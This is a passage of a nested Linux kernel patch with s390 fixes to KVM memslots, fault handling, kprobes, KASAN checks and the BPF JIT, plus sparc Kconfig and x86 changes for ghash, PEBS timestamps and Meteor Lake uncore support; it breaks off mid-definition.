+@@ -290,7 +293,10 @@ static inline struct ap_queue_status ap_qact(ap_qid_t qid, int ifbit,
+ 	unsigned long reg0 = qid | (5UL << 24) | ((ifbit & 0x01) << 22);
+ 	union {
+ 		unsigned long value;
+-		struct ap_queue_status status;
++		struct {
++			u32 _pad;
++			struct ap_queue_status status;
++		};
+ 	} reg1;
+ 	unsigned long reg2;
+ 
+diff --git a/arch/s390/kernel/early.c b/arch/s390/kernel/early.c
+index 6030fdd6997bc..9693c8630e73f 100644
+--- a/arch/s390/kernel/early.c
++++ b/arch/s390/kernel/early.c
+@@ -288,7 +288,6 @@ static void __init sort_amode31_extable(void)
+ 
+ void __init startup_init(void)
+ {
+-	sclp_early_adjust_va();
+ 	reset_tod_clock();
+ 	check_image_bootable();
+ 	time_early_init();
+diff --git a/arch/s390/kernel/head64.S b/arch/s390/kernel/head64.S
+index d7b8b6ad574dc..3b3bf8329e6c1 100644
+--- a/arch/s390/kernel/head64.S
++++ b/arch/s390/kernel/head64.S
+@@ -25,6 +25,7 @@ ENTRY(startup_continue)
+ 	larl	%r14,init_task
+ 	stg	%r14,__LC_CURRENT
+ 	larl	%r15,init_thread_union+THREAD_SIZE-STACK_FRAME_OVERHEAD-__PT_SIZE
++	brasl	%r14,sclp_early_adjust_va	# allow sclp_early_printk
+ #ifdef CONFIG_KASAN
+ 	brasl	%r14,kasan_early_init
+ #endif
+diff --git a/arch/s390/kernel/idle.c b/arch/s390/kernel/idle.c
+index 4bf1ee293f2b3..a0da049e73609 100644
+--- a/arch/s390/kernel/idle.c
++++ b/arch/s390/kernel/idle.c
+@@ -44,7 +44,7 @@ void account_idle_time_irq(void)
+ 	S390_lowcore.last_update_timer = idle->timer_idle_exit;
+ }
+ 
+-void arch_cpu_idle(void)
++void noinstr arch_cpu_idle(void)
+ {
+ 	struct s390_idle_data *idle = this_cpu_ptr(&s390_idle);
+ 	unsigned long idle_time;
+diff --git a/arch/s390/kernel/kprobes.c b/arch/s390/kernel/kprobes.c
+index 0032bdbe8e3fa..6c8872f76fb39 100644
+--- a/arch/s390/kernel/kprobes.c
++++ b/arch/s390/kernel/kprobes.c
+@@ -279,6 +279,7 @@ static void pop_kprobe(struct kprobe_ctlblk *kcb)
+ {
+ 	__this_cpu_write(current_kprobe, kcb->prev_kprobe.kp);
+ 	kcb->kprobe_status = kcb->prev_kprobe.status;
++	kcb->prev_kprobe.kp = NULL;
+ }
+ NOKPROBE_SYMBOL(pop_kprobe);
+ 
+@@ -433,12 +434,11 @@ static int post_kprobe_handler(struct pt_regs *regs)
+ 	if (!p)
+ 		return 0;
+ 
++	resume_execution(p, regs);
+ 	if (kcb->kprobe_status != KPROBE_REENTER && p->post_handler) {
+ 		kcb->kprobe_status = KPROBE_HIT_SSDONE;
+ 		p->post_handler(p, regs, 0);
+ 	}
+-
+-	resume_execution(p, regs);
+ 	pop_kprobe(kcb);
+ 	preempt_enable_no_resched();
+ 
+diff --git a/arch/s390/kernel/vdso64/Makefile b/arch/s390/kernel/vdso64/Makefile
+index 9e2b95a222a98..1605ba45ac4c0 100644
+--- a/arch/s390/kernel/vdso64/Makefile
++++ b/arch/s390/kernel/vdso64/Makefile
+@@ -25,7 +25,7 @@ KBUILD_AFLAGS_64 := $(filter-out -m64,$(KBUILD_AFLAGS))
+ KBUILD_AFLAGS_64 += -m64 -s
+ 
+ KBUILD_CFLAGS_64 := $(filter-out -m64,$(KBUILD_CFLAGS))
+-KBUILD_CFLAGS_64 += -m64 -fPIC -shared -fno-common -fno-builtin
++KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin
+ ldflags-y := -fPIC -shared -soname=linux-vdso64.so.1 \
+ 	     --hash-style=both --build-id=sha1 -T
+ 
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index cbf9c1b0beda4..729d4f949cfe8 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -228,5 +228,6 @@ SECTIONS
+ 	DISCARDS
+ 	/DISCARD/ : {
+ 		*(.eh_frame)
++		*(.interp)
+ 	}
+ }
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index bc491a73815c3..26f89ec3062ba 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -5579,23 +5579,40 @@ int kvm_arch_prepare_memory_region(struct kvm *kvm,
+ 	if (kvm_s390_pv_get_handle(kvm))
+ 		return -EINVAL;
+ 
+-	if (change == KVM_MR_DELETE || change == KVM_MR_FLAGS_ONLY)
+-		return 0;
++	if (change != KVM_MR_DELETE && change != KVM_MR_FLAGS_ONLY) {
++		/*
++		 * A few sanity checks. We can have memory slots which have to be
++		 * located/ended at a segment boundary (1MB). The memory in userland is
++		 * ok to be fragmented into various different vmas. It is okay to mmap()
++		 * and munmap() stuff in this slot after doing this call at any time
++		 */
+ 
+-	/* A few sanity checks. We can have memory slots which have to be
+-	   located/ended at a segment boundary (1MB). The memory in userland is
+-	   ok to be fragmented into various different vmas. It is okay to mmap()
+-	   and munmap() stuff in this slot after doing this call at any time */
++		if (new->userspace_addr & 0xffffful)
++			return -EINVAL;
+ 
+-	if (new->userspace_addr & 0xffffful)
+-		return -EINVAL;
++		size = new->npages * PAGE_SIZE;
++		if (size & 0xffffful)
++			return -EINVAL;
+ 
+-	size = new->npages * PAGE_SIZE;
+-	if (size & 0xffffful)
+-		return -EINVAL;
++		if ((new->base_gfn * PAGE_SIZE) + size > kvm->arch.mem_limit)
++			return -EINVAL;
++	}
+ 
+-	if ((new->base_gfn * PAGE_SIZE) + size > kvm->arch.mem_limit)
+-		return -EINVAL;
++	if (!kvm->arch.migration_mode)
++		return 0;
++
++	/*
++	 * Turn off migration mode when:
++	 * - userspace creates a new memslot with dirty logging off,
++	 * - userspace modifies an existing memslot (MOVE or FLAGS_ONLY) and
++	 *   dirty logging is turned off.
++	 * Migration mode expects dirty page logging being enabled to store
++	 * its dirty bitmap.
++	 */
++	if (change != KVM_MR_DELETE &&
++	    !(new->flags & KVM_MEM_LOG_DIRTY_PAGES))
++		WARN(kvm_s390_vm_stop_migration(kvm),
++		     "Failed to stop migration mode");
+ 
+ 	return 0;
+ }
+diff --git a/arch/s390/mm/dump_pagetables.c b/arch/s390/mm/dump_pagetables.c
+index 9953819d79596..ba5f802688781 100644
+--- a/arch/s390/mm/dump_pagetables.c
++++ b/arch/s390/mm/dump_pagetables.c
+@@ -33,10 +33,6 @@ enum address_markers_idx {
+ #endif
+ 	IDENTITY_AFTER_NR,
+ 	IDENTITY_AFTER_END_NR,
+-#ifdef CONFIG_KASAN
+-	KASAN_SHADOW_START_NR,
+-	KASAN_SHADOW_END_NR,
+-#endif
+ 	VMEMMAP_NR,
+ 	VMEMMAP_END_NR,
+ 	VMALLOC_NR,
+@@ -47,6 +43,10 @@ enum address_markers_idx {
+ 	ABS_LOWCORE_END_NR,
+ 	MEMCPY_REAL_NR,
+ 	MEMCPY_REAL_END_NR,
++#ifdef CONFIG_KASAN
++	KASAN_SHADOW_START_NR,
++	KASAN_SHADOW_END_NR,
++#endif
+ };
+ 
+ static struct addr_marker address_markers[] = {
+@@ -62,10 +62,6 @@ static struct addr_marker address_markers[] = {
+ #endif
+ 	[IDENTITY_AFTER_NR]	= {(unsigned long)_end, "Identity Mapping Start"},
+ 	[IDENTITY_AFTER_END_NR]	= {0, "Identity Mapping End"},
+-#ifdef CONFIG_KASAN
+-	[KASAN_SHADOW_START_NR]	= {KASAN_SHADOW_START, "Kasan Shadow Start"},
+-	[KASAN_SHADOW_END_NR]	= {KASAN_SHADOW_END, "Kasan Shadow End"},
+-#endif
+ 	[VMEMMAP_NR]		= {0, "vmemmap Area Start"},
+ 	[VMEMMAP_END_NR]	= {0, "vmemmap Area End"},
+ 	[VMALLOC_NR]		= {0, "vmalloc Area Start"},
+@@ -76,6 +72,10 @@ static struct addr_marker address_markers[] = {
+ 	[ABS_LOWCORE_END_NR]	= {0, "Lowcore Area End"},
+ 	[MEMCPY_REAL_NR]	= {0, "Real Memory Copy Area Start"},
+ 	[MEMCPY_REAL_END_NR]	= {0, "Real Memory Copy Area End"},
++#ifdef CONFIG_KASAN
++	[KASAN_SHADOW_START_NR]	= {KASAN_SHADOW_START, "Kasan Shadow Start"},
++	[KASAN_SHADOW_END_NR]	= {KASAN_SHADOW_END, "Kasan Shadow End"},
++#endif
+ 	{ -1, NULL }
+ };
+ 
+diff --git a/arch/s390/mm/extmem.c b/arch/s390/mm/extmem.c
+index 5060956b8e7d6..1bc42ce265990 100644
+--- a/arch/s390/mm/extmem.c
++++ b/arch/s390/mm/extmem.c
+@@ -289,15 +289,17 @@ segment_overlaps_others (struct dcss_segment *seg)
+ 
+ /*
+  * real segment loading function, called from segment_load
++ * Must return either an error code < 0, or the segment type code >= 0
+  */
+ static int
+ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long *end)
+ {
+ 	unsigned long start_addr, end_addr, dummy;
+ 	struct dcss_segment *seg;
+-	int rc, diag_cc;
++	int rc, diag_cc, segtype;
+ 
+ 	start_addr = end_addr = 0;
++	segtype = -1;
+ 	seg = kmalloc(sizeof(*seg), GFP_KERNEL | GFP_DMA);
+ 	if (seg == NULL) {
+ 		rc = -ENOMEM;
+@@ -326,9 +328,9 @@ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long
+ 	seg->res_name[8] = '\0';
+ 	strlcat(seg->res_name, " (DCSS)", sizeof(seg->res_name));
+ 	seg->res->name = seg->res_name;
+-	rc = seg->vm_segtype;
+-	if (rc == SEG_TYPE_SC ||
+-	    ((rc == SEG_TYPE_SR || rc == SEG_TYPE_ER) && !do_nonshared))
++	segtype = seg->vm_segtype;
++	if (segtype == SEG_TYPE_SC ||
++	    ((segtype == SEG_TYPE_SR || segtype == SEG_TYPE_ER) && !do_nonshared))
+ 		seg->res->flags |= IORESOURCE_READONLY;
+ 
+ 	/* Check for overlapping resources before adding the mapping. */
+@@ -386,7 +388,7 @@ __segment_load (char *name, int do_nonshared, unsigned long *addr, unsigned long
+  out_free:
+ 	kfree(seg);
+  out:
+-	return rc;
++	return rc < 0 ? rc : segtype;
+ }
+ 
+ /*
+diff --git a/arch/s390/mm/fault.c b/arch/s390/mm/fault.c
+index 9649d9382e0ae..8e84ed2bb944e 100644
+--- a/arch/s390/mm/fault.c
++++ b/arch/s390/mm/fault.c
+@@ -96,6 +96,20 @@ static enum fault_type get_fault_type(struct pt_regs *regs)
+ 	return KERNEL_FAULT;
+ }
+ 
++static unsigned long get_fault_address(struct pt_regs *regs)
++{
++	unsigned long trans_exc_code = regs->int_parm_long;
++
++	return trans_exc_code & __FAIL_ADDR_MASK;
++}
++
++static bool fault_is_write(struct pt_regs *regs)
++{
++	unsigned long trans_exc_code = regs->int_parm_long;
++
++	return (trans_exc_code & store_indication) == 0x400;
++}
++
+ static int bad_address(void *p)
+ {
+ 	unsigned long dummy;
+@@ -228,15 +242,26 @@ static noinline void do_sigsegv(struct pt_regs *regs, int si_code)
+ 			(void __user *)(regs->int_parm_long & __FAIL_ADDR_MASK));
+ }
+ 
+-static noinline void do_no_context(struct pt_regs *regs)
++static noinline void do_no_context(struct pt_regs *regs, vm_fault_t fault)
+ {
++	enum fault_type fault_type;
++	unsigned long address;
++	bool is_write;
++
+ 	if (fixup_exception(regs))
+ 		return;
++	fault_type = get_fault_type(regs);
++	if ((fault_type == KERNEL_FAULT) && (fault == VM_FAULT_BADCONTEXT)) {
++		address = get_fault_address(regs);
++		is_write = fault_is_write(regs);
++		if (kfence_handle_page_fault(address, is_write, regs))
++			return;
++	}
+ 	/*
+ 	 * Oops. The kernel tried to access some bad page. We'll have to
+ 	 * terminate things with extreme prejudice.
+ 	 */
+-	if (get_fault_type(regs) == KERNEL_FAULT)
++	if (fault_type == KERNEL_FAULT)
+ 		printk(KERN_ALERT "Unable to handle kernel pointer dereference"
+ 		       " in virtual kernel address space\n");
+ 	else
+@@ -255,7 +280,7 @@ static noinline void do_low_address(struct pt_regs *regs)
+ 		die (regs, "Low-address protection");
+ 	}
+ 
+-	do_no_context(regs);
++	do_no_context(regs, VM_FAULT_BADACCESS);
+ }
+ 
+ static noinline void do_sigbus(struct pt_regs *regs)
+@@ -286,28 +311,28 @@ static noinline void do_fault_error(struct pt_regs *regs, vm_fault_t fault)
+ 		fallthrough;
+ 	case VM_FAULT_BADCONTEXT:
+ 	case VM_FAULT_PFAULT:
+-		do_no_context(regs);
++		do_no_context(regs, fault);
+ 		break;
+ 	case VM_FAULT_SIGNAL:
+ 		if (!user_mode(regs))
+-			do_no_context(regs);
++			do_no_context(regs, fault);
+ 		break;
+ 	default: /* fault & VM_FAULT_ERROR */
+ 		if (fault & VM_FAULT_OOM) {
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				pagefault_out_of_memory();
+ 		} else if (fault & VM_FAULT_SIGSEGV) {
+ 			/* Kernel mode? Handle exceptions or die */
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				do_sigsegv(regs, SEGV_MAPERR);
+ 		} else if (fault & VM_FAULT_SIGBUS) {
+ 			/* Kernel mode? Handle exceptions or die */
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				do_sigbus(regs);
+ 		} else
+@@ -334,7 +359,6 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 	struct mm_struct *mm;
+ 	struct vm_area_struct *vma;
+ 	enum fault_type type;
+-	unsigned long trans_exc_code;
+ 	unsigned long address;
+ 	unsigned int flags;
+ 	vm_fault_t fault;
+@@ -351,9 +375,8 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 		return 0;
+ 
+ 	mm = tsk->mm;
+-	trans_exc_code = regs->int_parm_long;
+-	address = trans_exc_code & __FAIL_ADDR_MASK;
+-	is_write = (trans_exc_code & store_indication) == 0x400;
++	address = get_fault_address(regs);
++	is_write = fault_is_write(regs);
+ 
+ 	/*
+ 	 * Verify that the fault happened in user space, that
+@@ -364,8 +387,6 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 	type = get_fault_type(regs);
+ 	switch (type) {
+ 	case KERNEL_FAULT:
+-		if (kfence_handle_page_fault(address, is_write, regs))
+-			return 0;
+ 		goto out;
+ 	case USER_FAULT:
+ 	case GMAP_FAULT:
+diff --git a/arch/s390/mm/vmem.c b/arch/s390/mm/vmem.c
+index ee1a97078527b..9a0ce5315f36d 100644
+--- a/arch/s390/mm/vmem.c
++++ b/arch/s390/mm/vmem.c
+@@ -297,7 +297,7 @@ static void try_free_pmd_table(pud_t *pud, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 	pmd = pmd_offset(pud, start);
+@@ -372,7 +372,7 @@ static void try_free_pud_table(p4d_t *p4d, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 
+@@ -426,7 +426,7 @@ static void try_free_p4d_table(pgd_t *pgd, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 
+diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c
+index af35052d06ed6..fbdba4c306bea 100644
+--- a/arch/s390/net/bpf_jit_comp.c
++++ b/arch/s390/net/bpf_jit_comp.c
+@@ -1393,8 +1393,16 @@ static noinline int bpf_jit_insn(struct bpf_jit *jit, struct bpf_prog *fp,
+ 		/* lg %r1,bpf_func(%r1) */
+ 		EMIT6_DISP_LH(0xe3000000, 0x0004, REG_1, REG_1, REG_0,
+ 			      offsetof(struct bpf_prog, bpf_func));
+-		/* bc 0xf,tail_call_start(%r1) */
+-		_EMIT4(0x47f01000 + jit->tail_call_start);
++		if (nospec_uses_trampoline()) {
++			jit->seen |= SEEN_FUNC;
++			/* aghi %r1,tail_call_start */
++			EMIT4_IMM(0xa70b0000, REG_1, jit->tail_call_start);
++			/* brcl 0xf,__s390_indirect_jump_r1 */
++			EMIT6_PCREL_RILC(0xc0040000, 0xf, jit->r1_thunk_ip);
++		} else {
++			/* bc 0xf,tail_call_start(%r1) */
++			_EMIT4(0x47f01000 + jit->tail_call_start);
++		}
+ 		/* out: */
+ 		if (jit->prg_buf) {
+ 			*(u16 *)(jit->prg_buf + patch_1_clrj + 2) =
+diff --git a/arch/sparc/Kconfig b/arch/sparc/Kconfig
+index 4d3d1af90d521..84437a4c65454 100644
+--- a/arch/sparc/Kconfig
++++ b/arch/sparc/Kconfig
+@@ -283,7 +283,7 @@ config ARCH_FORCE_MAX_ORDER
+ 	  This config option is actually maximum order plus one. For example,
+ 	  a value of 13 means that the largest free memory block is 2^12 pages.
+ 
+-if SPARC64
++if SPARC64 || COMPILE_TEST
+ source "kernel/power/Kconfig"
+ endif
+ 
+diff --git a/arch/x86/crypto/ghash-clmulni-intel_glue.c b/arch/x86/crypto/ghash-clmulni-intel_glue.c
+index 1f1a95f3dd0ca..c0ab0ff4af655 100644
+--- a/arch/x86/crypto/ghash-clmulni-intel_glue.c
++++ b/arch/x86/crypto/ghash-clmulni-intel_glue.c
+@@ -19,6 +19,7 @@
+ #include <crypto/internal/simd.h>
+ #include <asm/cpu_device_id.h>
+ #include <asm/simd.h>
++#include <asm/unaligned.h>
+ 
+ #define GHASH_BLOCK_SIZE	16
+ #define GHASH_DIGEST_SIZE	16
+@@ -54,15 +55,14 @@ static int ghash_setkey(struct crypto_shash *tfm,
+ 			const u8 *key, unsigned int keylen)
+ {
+ 	struct ghash_ctx *ctx = crypto_shash_ctx(tfm);
+-	be128 *x = (be128 *)key;
+ 	u64 a, b;
+ 
+ 	if (keylen != GHASH_BLOCK_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* perform multiplication by 'x' in GF(2^128) */
+-	a = be64_to_cpu(x->a);
+-	b = be64_to_cpu(x->b);
++	a = get_unaligned_be64(key);
++	b = get_unaligned_be64(key + 8);
+ 
+ 	ctx->shash.a = (b << 1) | (a >> 63);
+ 	ctx->shash.b = (a << 1) | (b >> 63);
+diff --git a/arch/x86/events/intel/ds.c b/arch/x86/events/intel/ds.c
+index 446d2833efa76..3ff38e7409e3d 100644
+--- a/arch/x86/events/intel/ds.c
++++ b/arch/x86/events/intel/ds.c
+@@ -2,12 +2,14 @@
+ #include <linux/bitops.h>
+ #include <linux/types.h>
+ #include <linux/slab.h>
++#include <linux/sched/clock.h>
+ 
+ #include <asm/cpu_entry_area.h>
+ #include <asm/perf_event.h>
+ #include <asm/tlbflush.h>
+ #include <asm/insn.h>
+ #include <asm/io.h>
++#include <asm/timer.h>
+ 
+ #include "../perf_event.h"
+ 
+@@ -1519,6 +1521,27 @@ static u64 get_data_src(struct perf_event *event, u64 aux)
+ 	return val;
+ }
+ 
++static void setup_pebs_time(struct perf_event *event,
++			    struct perf_sample_data *data,
++			    u64 tsc)
++{
++	/* Converting to a user-defined clock is not supported yet. */
++	if (event->attr.use_clockid != 0)
++		return;
++
++	/*
++	 * Doesn't support the conversion when the TSC is unstable.
++	 * The TSC unstable case is a corner case and very unlikely to
++	 * happen. If it happens, the TSC in a PEBS record will be
++	 * dropped and fall back to perf_event_clock().
++	 */
++	if (!using_native_sched_clock() || !sched_clock_stable())
++		return;
++
++	data->time = native_sched_clock_from_tsc(tsc) + __sched_clock_offset;
++	data->sample_flags |= PERF_SAMPLE_TIME;
++}
++
+ #define PERF_SAMPLE_ADDR_TYPE	(PERF_SAMPLE_ADDR |		\
+ 				 PERF_SAMPLE_PHYS_ADDR |	\
+ 				 PERF_SAMPLE_DATA_PAGE_SIZE)
+@@ -1668,11 +1691,8 @@ static void setup_pebs_fixed_sample_data(struct perf_event *event,
+ 	 *
+ 	 * We can only do this for the default trace clock.
+ 	 */
+-	if (x86_pmu.intel_cap.pebs_format >= 3 &&
+-		event->attr.use_clockid == 0) {
+-		data->time = native_sched_clock_from_tsc(pebs->tsc);
+-		data->sample_flags |= PERF_SAMPLE_TIME;
+-	}
++	if (x86_pmu.intel_cap.pebs_format >= 3)
++		setup_pebs_time(event, data, pebs->tsc);
+ 
+ 	if (has_branch_stack(event)) {
+ 		data->br_stack = &cpuc->lbr_stack;
+@@ -1735,10 +1755,7 @@ static void setup_pebs_adaptive_sample_data(struct perf_event *event,
+ 	perf_sample_data_init(data, 0, event->hw.last_period);
+ 	data->period = event->hw.last_period;
+ 
+-	if (event->attr.use_clockid == 0) {
+-		data->time = native_sched_clock_from_tsc(basic->tsc);
+-		data->sample_flags |= PERF_SAMPLE_TIME;
+-	}
++	setup_pebs_time(event, data, basic->tsc);
+ 
+ 	/*
+ 	 * We must however always use iregs for the unwinder to stay sane; the
+diff --git a/arch/x86/events/intel/uncore.c b/arch/x86/events/intel/uncore.c
+index 459b1aafd4d4a..27b34f5b87600 100644
+--- a/arch/x86/events/intel/uncore.c
++++ b/arch/x86/events/intel/uncore.c
+@@ -1765,6 +1765,11 @@ static const struct intel_uncore_init_fun adl_uncore_init __initconst = {
+ 	.mmio_init = adl_uncore_mmio_init,
+ };
+ 
++static const struct intel_uncore_init_fun mtl_uncore_init __initconst = {
++	.cpu_init = mtl_uncore_cpu_init,
++	.mmio_init = adl_uncore_mmio_init,
++};
++
+ static const struct intel_uncore_init_fun icx_uncore_init __initconst = {
+ 	.cpu_init = icx_uncore_cpu_init,
+ 	.pci_init = icx_uncore_pci_init,
+@@ -1832,6 +1837,8 @@ static const struct x86_cpu_id intel_uncore_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,		&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&adl_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE,		&mtl_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE_L,	&mtl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ATOM_TREMONT_D,	&snr_uncore_init),
+diff --git a/arch/x86/events/intel/uncore.h b/arch/x86/events/intel/uncore.h
+index b363fddc2a89e..b74e352910f45 100644
+--- a/arch/x86/events/intel/uncore.h
++++ b/arch/x86/events/intel/uncore.h
+@@ -587,6 +587,7 @@ void skl_uncore_cpu_init(void);
+ void icl_uncore_cpu_init(void);
+ void tgl_uncore_cpu_init(void);
+ void adl_uncore_cpu_init(void);
++void mtl_uncore_cpu_init(void);
+ void tgl_uncore_mmio_init(void);
+ void tgl_l_uncore_mmio_init(void);
+ void adl_uncore_mmio_init(void);
+diff --git a/arch/x86/events/intel/uncore_snb.c b/arch/x86/events/intel/uncore_snb.c
+index 1f4869227efb9..7fd4334e12a17 100644
+--- a/arch/x86/events/intel/uncore_snb.c
++++ b/arch/x86/events/intel/uncore_snb.c
+@@ -109,6 +109,19 @@
+ #define PCI_DEVICE_ID_INTEL_RPL_23_IMC		0xA728
+ #define PCI_DEVICE_ID_INTEL_RPL_24_IMC		0xA729
+ #define PCI_DEVICE_ID_INTEL_RPL_25_IMC		0xA72A
++#define PCI_DEVICE_ID_INTEL_MTL_1_IMC		0x7d00
++#define PCI_DEVICE_ID_INTEL_MTL_2_IMC		0x7d01
++#define PCI_DEVICE_ID_INTEL_MTL_3_IMC		0x7d02
++#define PCI_DEVICE_ID_INTEL_MTL_4_IMC		0x7d05
++#define PCI_DEVICE_ID_INTEL_MTL_5_IMC		0x7d10
++#define PCI_DEVICE_ID_INTEL_MTL_6_IMC		0x7d14
++#define PCI_DEVICE_ID_INTEL_MTL_7_IMC		0x7d15
++#define PCI_DEVICE_ID_INTEL_MTL_8_IMC		0x7d16
++#define PCI_DEVICE_ID_INTEL_MTL_9_IMC		0x7d21
++#define PCI_DEVICE_ID_INTEL_MTL_10_IMC		0x7d22
++#define PCI_DEVICE_ID_INTEL_MTL_11_IMC		0x7d23
++#define PCI_DEVICE_ID_INTEL_MTL_12_IMC		0x7d24
++#define PCI_DEVICE_ID_INTEL_MTL_13_IMC		0x7d28
+ 
+ 
+ #define IMC_UNCORE_DEV(a)						\
+@@ -205,6 +218,32 @@
+ #define ADL_UNC_ARB_PERFEVTSEL0			0x2FD0
+ #define ADL_UNC_ARB_MSR_OFFSET			0x8
+ 
++/* MTL Cbo register */
++#define MTL_UNC_CBO_0_PER_CTR0			0x2448
++#define MTL_UNC_CBO_0_PERFEVTSEL0		0x2442
++
++/* MTL HAC_ARB register */
++#define MTL_UNC_HAC_ARB_CTR			0x2018
++#define MTL_UNC_HAC_ARB_CTRL			0x2012
++
++/* MTL ARB register */
++#define MTL_UNC_ARB_CTR				0x2418
++#define MTL_UNC_ARB_CTRL			0x2412
++
++/* MTL cNCU register */
++#define MTL_UNC_CNCU_FIXED_CTR			0x2408
++#define MTL_UNC_CNCU_FIXED_CTRL			0x2402
++#define MTL_UNC_CNCU_BOX_CTL			0x240e
++
++/* MTL sNCU register */
++#define MTL_UNC_SNCU_FIXED_CTR			0x2008
++#define MTL_UNC_SNCU_FIXED_CTRL			0x2002
++#define MTL_UNC_SNCU_BOX_CTL			0x200e
++
++/* MTL HAC_CBO register */
++#define MTL_UNC_HBO_CTR				0x2048
++#define MTL_UNC_HBO_CTRL			0x2042
++
+ DEFINE_UNCORE_FORMAT_ATTR(event, event, "config:0-7");
+ DEFINE_UNCORE_FORMAT_ATTR(umask, umask, "config:8-15");
+ DEFINE_UNCORE_FORMAT_ATTR(chmask, chmask, "config:8-11");
+@@ -598,6 +637,115 @@ void adl_uncore_cpu_init(void)
+ 	uncore_msr_uncores = adl_msr_uncores;
+ }
+ 
++static struct intel_uncore_type mtl_uncore_cbox = {
++	.name		= "cbox",
++	.num_counters   = 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_CBO_0_PER_CTR0,
++	.event_ctl	= MTL_UNC_CBO_0_PERFEVTSEL0,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_hac_arb = {
++	.name		= "hac_arb",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_HAC_ARB_CTR,
++	.event_ctl	= MTL_UNC_HAC_ARB_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_arb = {
++	.name		= "arb",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_ARB_CTR,
++	.event_ctl	= MTL_UNC_ARB_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_hac_cbox = {
++	.name		= "hac_cbox",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_HBO_CTR,
++	.event_ctl	= MTL_UNC_HBO_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static void mtl_uncore_msr_init_box(struct intel_uncore_box *box)
++{
++	wrmsrl(uncore_msr_box_ctl(box), SNB_UNC_GLOBAL_CTL_EN);
++}
++
++static struct intel_uncore_ops mtl_uncore_msr_ops = {
++	.init_box	= mtl_uncore_msr_init_box,
++	.disable_event	= snb_uncore_msr_disable_event,
++	.enable_event	= snb_uncore_msr_enable_event,
++	.read_counter	= uncore_msr_read_counter,
++};
++
++static struct intel_uncore_type mtl_uncore_cncu = {
++	.name		= "cncu",
++	.num_counters   = 1,
++	.num_boxes	= 1,
++	.box_ctl	= MTL_UNC_CNCU_BOX_CTL,
++	.fixed_ctr_bits = 48,
++	.fixed_ctr	= MTL_UNC_CNCU_FIXED_CTR,
++	.fixed_ctl	= MTL_UNC_CNCU_FIXED_CTRL,
++	.single_fixed	= 1,
++	.event_mask	= SNB_UNC_CTL_EV_SEL_MASK,
++	.format_group	= &icl_uncore_clock_format_group,
++	.ops		= &mtl_uncore_msr_ops,
++	.event_descs	= icl_uncore_events,
++};
++
++static struct intel_uncore_type mtl_uncore_sncu = {
++	.name		= "sncu",
